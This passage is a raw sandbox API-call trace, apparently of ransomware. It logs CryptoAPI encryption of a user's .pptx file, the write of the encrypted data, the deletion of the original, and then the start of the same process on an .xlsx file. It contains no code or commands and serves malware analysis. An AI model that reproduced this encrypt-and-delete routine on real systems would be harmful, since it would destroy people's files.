Flags=0x0, Size=0x10) returned 0x43ca568 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6f55) returned 0x4904e68 [0076.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca958 [0076.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.988] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x6f55, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x6f60) returned 1 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0076.989] CharLowerBuffW (in: lpsz="byte[28513]", cchLength=0xb | out: lpsz="byte[28513]") returned 0xb [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0076.989] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0076.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0076.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0076.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0076.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cac40 [0076.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.991] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4904e68*, pdwDataLen=0x144e790*=0x6f55, dwBufLen=0x6f60 | out: pbData=0x4904e68*, pdwDataLen=0x144e790*=0x6f60) returned 1 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0076.991] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0076.991] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.991] WriteFile (in: hFile=0x298, lpBuffer=0x4927b80*, nNumberOfBytesToWrite=0x6f60, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4927b80*, lpNumberOfBytesWritten=0x144f194*=0x6f60, lpOverlapped=0x0) returned 1 [0076.993] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0076.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca568, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0076.994] CryptDestroyKey (hKey=0x41ac700) returned 1 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.994] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.994] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.994] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0076.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0076.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0076.995] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.995] FreeLibrary (hLibModule=0x756e0000) returned 1 [0076.995] CloseHandle (hObject=0x258) returned 1 [0076.995] CloseHandle (hObject=0x298) returned 1 [0076.997] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx", lpFilePart=0x0) returned 0x2d [0076.997] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\li-iwwmlwnmp-i.pptx")) returned 0x20 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0076.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.998] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba22bc0, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcebf87c0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xcebf87c0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x6f55, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="LI-IwwMLWnmp-I.pptx", cAlternateFileName="LI-IWW~1.PPT")) returned 0x41ac2c0 [0076.998] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\li-iwwmlwnmp-i.pptx")) returned 1 [0077.004] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ba22bc0, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcebf87c0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xcebf87c0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x6f55, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="LI-IwwMLWnmp-I.pptx", cAlternateFileName="LI-IWW~1.PPT")) returned 0 [0077.004] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.004] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0077.004] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0077.005] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.005] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0077.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.005] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0077.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0077.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0077.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ef0 [0077.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0077.006] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0077.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.007] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.007] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, 